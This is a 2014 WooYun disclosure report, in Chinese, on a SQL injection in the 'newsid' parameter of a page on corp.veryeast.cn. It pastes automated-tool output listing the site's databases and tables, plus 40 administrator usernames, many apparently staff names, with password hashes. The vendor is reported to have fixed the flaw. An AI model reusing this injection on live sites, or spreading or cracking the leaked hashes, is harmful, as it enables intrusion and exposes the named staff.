乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-17: 细节已通知厂商并且等待厂商处理中 2014-04-17: 厂商已经确认,细节仅向厂商公开 2014-04-27: 细节向核心白帽子及相关领域专家公开 2014-05-07: 细节向普通白帽子公开 2014-05-17: 细节向实习白帽子公开 2014-06-01: 细节向公众公开
最佳东方还是蛮注重安全的哈~~~
问题站点:
corp.veryeast.cn
漏洞链接:
http://corp.veryeast.cn/question/getresult.asp?newsid=
对newsid参数为过滤单引号报错,很明显的一处注射
也懒的手工了,丢工具跑了
数据库:
available databases [3[*] 9first[*] bangdating[*] cp[*] dfws_edm[*] dfwsCMS[*] dvbbs[*] hotel_collect[*] hrTool[*] jdrc[*] jdrc_20131019[*] jdrc_table_backup[*] jobbon[*] lt[*] master[*] meadin[*] meadinvote[*] model[*] msdb[*] papers[*] ReportServer[*] ReportServerTempDB[*] sendmail[*] tempdb[*] ve_crm[*] vebbs[*] veryeast[*] veryeastcms[*] wiki[*] xlms[*] xz_ihma_crm[*] xzbbs[*] XZHome
32个库~~当前库:veryeastcms表:
Database: veryeastcms[160 tables]+--------------------------+| FS_AD_Class || FS_AD_Info || FS_AD_Source || FS_AD_TxtInfo || FS_AP_City || FS_AP_Consume || FS_AP_Job || FS_AP_Job_Public || FS_AP_Payment || FS_AP_Province || FS_AP_Resume_BaseInfo || FS_AP_Resume_Certificate || FS_AP_Resume_EducateExp || FS_AP_Resume_Intention || FS_AP_Resume_Language || FS_AP_Resume_Mail || FS_AP_Resume_Other || FS_AP_Resume_Position || FS_AP_Resume_ProjectExp || FS_AP_Resume_TrainExp || FS_AP_Resume_WorkCity || FS_AP_Resume_WorkExp || FS_AP_SysPara || FS_AP_Trade || FS_AP_UserList || FS_DS_Address || FS_DS_Class || FS_DS_List || FS_DS_Special || FS_DS_Style || FS_DS_SysPara || FS_FL_Class || FS_FL_FrendList || FS_FL_SysPara || FS_HS_Picture || FS_HS_Quotation || FS_HS_Second || FS_HS_SysPara || FS_HS_Tenancy || FS_HS_UserList || FS_ME_Answer || FS_ME_AnswerForPoint || FS_ME_Answer_User || FS_ME_Award || FS_ME_Book || FS_ME_BuyBag || FS_ME_Card || FS_ME_CardPut || FS_ME_CertFile || FS_ME_CorpCard || FS_ME_CorpUser || FS_ME_Favorite || FS_ME_FavoriteClass || FS_ME_Friends || FS_ME_GetThing || FS_ME_Group || FS_ME_GroupDebate || FS_ME_GroupDebateClass || FS_ME_GroupDebateManage || FS_ME_Help || FS_ME_InfoClass || FS_ME_InfoContribution || FS_ME_InfoDown || FS_ME_InfoProduct || FS_ME_InfoiLogParam || FS_ME_InfoiLogTemplet || FS_ME_Infoilog || FS_ME_Log || FS_ME_Message || FS_ME_MyInfo || FS_ME_MySysPara || FS_ME_News || FS_ME_Order || FS_ME_Order_Detail || FS_ME_POP || FS_ME_Pay || FS_ME_Photo || FS_ME_PhotoClass || FS_ME_Prize || FS_ME_Report || FS_ME_Review || FS_ME_SysPara || FS_ME_User_Prize || FS_ME_Users || FS_ME_VocationClass || FS_ME_businesscard || FS_ME_businesscardClass || FS_ME_iLogClass || FS_ME_iLogSysParam || FS_MF_Admin || FS_MF_AdminGroup || FS_MF_Config || FS_MF_DefineData || FS_MF_DefineTable || FS_MF_DefineTableClass || FS_MF_Error_Log || FS_MF_FreeLabel || FS_MF_Labestyle || FS_MF_Lable || FS_MF_LableClass || FS_MF_Login_Log || FS_MF_Mod || FS_MF_Mod_Para || FS_MF_Oper_Log || FS_MF_POP || FS_MF_StyleClass || FS_MF_Sub_Sys || FS_MS_Company || FS_MS_ExpressCompany || FS_MS_PayMethod || FS_MS_Products || FS_MS_ProductsClass || FS_MS_Special || FS_MS_SysPara || FS_MS_WithDraw || FS_MS_WithDraw_Detail || FS_NS_FreeJsFile || FS_NS_Freejs || FS_NS_General || FS_NS_News || FS_NS_NewsClass || FS_NS_News_Unrgl || FS_NS_SpeciaList || FS_NS_Special || FS_NS_SysParam || FS_NS_Sysjs || FS_NS_TodayPic || FS_SD_Address || FS_SD_Class || FS_SD_Config || FS_SD_News || FS_SS_Stat || FS_SS_SysPara || FS_VE_QuestionResult || FS_VS_Class || FS_VS_Items || FS_VS_Items_Result || FS_VS_Steps || FS_VS_SysPara || FS_VS_Theme || FS_WS_BBS || FS_WS_Class || FS_WS_Config || FS_WS_NewsTell || VE_Survey_Class || VE_Survey_Item || VE_Survey_Result || VE_Survey_Topic || VE_Survey_User || VE_sendMail || xlaALSBusy || xlaALSCans || xlaALSCustomers || xlaALSDepts || xlaALSRequests || xlaALSUsers || xlaALSVisitors || xlaALSiDeptsCans || xlaALSiUsersCans || xlaALSiUsersDepts |+--------------------------+
这么多表,不难看出数据量有多大管理账号:
Database: veryeastcmsTable: FS_MF_Admin[40 entries]+---------------+------------------+| Admin_Name | Admin_Pass_Word |+---------------+------------------+| admin | ee8361d8773b19d0 || caibian | 961f721aba704dd7 || chengting | 49ba59abbe56e057 || chenjie | 2aa5efe8a2467438 || chenlingxiao | 0e72c85d36be5edc || chenxuejuan | 28edea3803d9aeab || daiyeqin | 44c258f9e94f9a1b || fengzenghua | 49ba59abbe56e057 || fuhuayan | 49ba59abbe56e057 || huangxian | 49ba59abbe56e057 || hudan | 49ba59abbe56e057 || huhailin | 4ac646c9e65a1769 || huxiaoling | 49ba59abbe56e057 || jinweiwei | 49ba59abbe56e057 || jiqinghuan | 4305282bdebcb792 || liling | 49ba59abbe56e057 || lishanshan | 11002a996f767f06 || liuxiuliang | 49ba59abbe56e057 || lixiangqin | f4671fe259c2c911 || liyang | 7c722d6ac7b3c8be || qiulanglang | 49ba59abbe56e057 || ruanshufang | 7b8dc4ec98d843c1 || shichangzhuli | 49ba59abbe56e057 || shishanshan | 49ba59abbe56e057 || sunhuaying | a3481141fc7f4454 || sunshaochen | 7db75a7ec1ab2755 || tongqingling | 49ba59abbe56e057 || wangxiaoyan | 7f7a01899b18e4fb || wupengfei | 49ba59abbe56e057 || wuyunyun | ae1450e4fa7252b0 || xiefang | 039a376d7ce793ee || xiefei | 49ba59abbe56e057 || yaozhuo | 49ba59abbe56e057 || zhanglin | 49ba59abbe56e057 || zhangming | 3c4040fafda4523d || zhangrui | 49ba59abbe56e057 || zhaoziying | 49ba59abbe56e057 || zhiban | 49ba59abbe56e057 || zhoulingjia | 119d5f6c8576bda1 || zhouyebo | 49ba59abbe56e057 |+---------------+------------------+
只是检测,所以到此为止,也没有深入下去了~~
过滤~
危害等级:高
漏洞Rank:20
确认时间:2014-04-17 15:30
确认漏洞,感谢@卡卡
2014-04-17:漏洞已修复